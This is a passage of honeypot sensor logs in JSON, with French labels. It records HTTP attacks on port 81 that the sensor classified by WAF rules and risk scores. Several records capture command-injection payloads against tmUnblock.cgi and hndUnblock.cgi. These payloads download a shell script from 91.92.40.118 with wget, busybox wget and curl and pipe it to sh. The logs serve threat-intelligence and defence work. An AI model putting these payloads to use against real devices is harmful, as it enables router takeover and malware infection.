\u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11860740,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59648,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002264082a1af3fcfb231944e267d5493de0b8e0037c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 287, \u0022payload_entropy\u0022: 5.1161065781565025, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002243ce42d445bc01eea8fd33471e38cdf3a2a66dea\u0022, \u0022event_fingerprint\u0022: \u002271d6865b91097a9032496ad96359d906b136a3cb\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022497f550dffb549cc468c7b52e196f3c6\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\\r\\nHost: 62.3.\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d2a1e08d10671ad7ba87d036358e39e88cf69ec4\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":287},{"id":11860741,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59656,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 384, \u0022payload_entropy\u0022: 5.314895079909732, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220a6a33b97433411fefc01a8405c1ff51b11f989e\u0022, \u0022event_fingerprint\u0022: \u0022a8b16e027d7ba1f4c7acbfebef133b66414569ec\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002233db797c426ca642a2903469921e4d67\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3Bbu\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: 